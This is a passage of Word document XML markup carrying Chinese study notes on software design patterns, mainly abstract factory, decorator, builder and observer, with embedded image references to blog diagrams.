            <wp:docPr id="296" name="图片 4" descr="http://pic002.cnblogs.com/images/2011/267603/20111219122536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pic002.cnblogs.com/images/2011/267603/2011121912253616.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4357421" cy="1236563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016C9C" w:rsidRDefault="00016C9C" w:rsidP="00016C9C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>抽象工厂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016C9C" w:rsidRDefault="00016C9C" w:rsidP="00016C9C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00016C9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个抽象产品类，派生出多个具体产品类；一个抽象工厂类，派生出多个具体工厂类；每个具体工厂类可创建多个具体产品类的实例。即提供一个创建一系列相关或相互依赖对象的接口，而无需指定他们的具体的类。“一对多”的关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016C9C" w:rsidRPr="00016C9C" w:rsidRDefault="00016C9C" w:rsidP="00016C9C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5273104" cy="1658203"/>
            <wp:effectExtent l="19050" t="0" r="3746" b="0"/>
            <wp:docPr id="297" name="图片 7" descr="http://pic002.cnblogs.com/images/2011/267603/20111219122606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pic002.cnblogs.com/images/2011/267603/2011121912260668.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1658582"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF381B" w:rsidRPr="00BF381B" w:rsidRDefault="004F16AB" w:rsidP="00BF381B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00BF381B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF381B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4E9C" w:rsidRDefault="00471426" w:rsidP="00471426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00471426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java.io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包采用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00471426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>装饰器模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00471426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Decorator</w:t>
      </w:r>
      <w:r w:rsidRPr="00471426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰器，顾名思义，就是动态地给一个对象添加一些额外的职责</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00434C47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>代码复用尽可能使用委托</w:t>
      </w:r>
      <w:r w:rsidR="00434C47" w:rsidRPr="00434C47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00434C47" w:rsidRPr="00434C47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对象组合</w:t>
      </w:r>
      <w:r w:rsidR="00434C47" w:rsidRPr="00434C47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00434C47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，而不是使用继承。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为继承是一种紧密耦合，任何父类的改动都会影响其子类，不利于系统维护。装饰者模式复用系统中各个组件，在运行时将这些功能组件进行叠加，从而构造成一个大对象。而各个子功能模块，被很好地维护在各个组件的相关类中，拥有整洁的系统结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00471426" w:rsidRDefault="00471426" w:rsidP="00471426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00471426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰模式在于在原有的功能上添加新的职责。装饰模式能够提供比继承更灵活的对象扩展能力，但是也往往由于这种灵活性会是系统调用变的复杂</w:t>
      </w:r>
      <w:r w:rsidR="00993FA6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434C47" w:rsidRDefault="00434C47" w:rsidP="00434C47">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4240816" cy="1804946"/>
            <wp:effectExtent l="19050" t="0" r="7334" b="0"/>
            <wp:docPr id="305" name="图片 4" descr="http://my.csdn.net/uploads/201208/19/1345385564_53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my.csdn.net/uploads/201208/19/1345385564_5334.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4243207" cy="1805964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC30B3" w:rsidRDefault="00CC30B3" w:rsidP="00434C47">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC30B3" w:rsidRDefault="00CC30B3" w:rsidP="00CC30B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：组件对象的接口，可以给这些对象动态的添加职责；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC30B3" w:rsidRDefault="00CC30B3" w:rsidP="00CC30B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    ConcreteComponent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：具体的组件对象，实现了组件接口。该对象通常就是被装饰器装饰的原始对象，可以给这个对象添加职责；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC30B3" w:rsidRDefault="00CC30B3" w:rsidP="00CC30B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    Decorator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：所有装饰器的父类，需要定义一个与组件接口一致的接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>主要是为了实现装饰器功能的复用，即具体的装饰器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可以装饰另外一个具体的装饰器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，因为装饰器类也是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Component)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，并持有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象，该对象其实就是被装饰的对象。如果不继承组件接口类，则只能为某个组件添加单一的功能，即装饰器对象不能在装饰其他的装饰器对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC30B3" w:rsidRDefault="00CC30B3" w:rsidP="00CC30B3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    ConcreteDecorator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：具体的装饰器类，实现具体要向被装饰对象添加的功能。用来装饰具体的组件对象或者另外一个具体的装饰器对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC30B3" w:rsidRPr="00CC30B3" w:rsidRDefault="00CC30B3" w:rsidP="00CC30B3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF381B" w:rsidRPr="004F16AB" w:rsidRDefault="004F16AB" w:rsidP="004F16AB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="00BF381B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Builder</w:t>
      </w:r>
      <w:r w:rsidR="00BF381B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21FE8" w:rsidRDefault="00C21FE8" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
      <w:r w:rsidR="003D1886">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F16AB" w:rsidRPr="004F16AB" w:rsidRDefault="004F16AB" w:rsidP="004F16AB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布订阅者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF05D8" w:rsidRPr="00CF05D8" w:rsidRDefault="00CF05D8" w:rsidP="00CF05D8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>监听器模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：事件源经过事件的封装传给监听器，当事件源触发事件后，监听器接收到事件对象可以回调事件的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF05D8" w:rsidRDefault="00CF05D8" w:rsidP="00CF05D8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>观察者模式：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>观察者</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Observer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相当于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>事件监听者</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被观察者</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Observable)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相当于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF05D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>事件源</w:t>
      </w:r>
      <w:r w:rsidR="007305E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007305E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
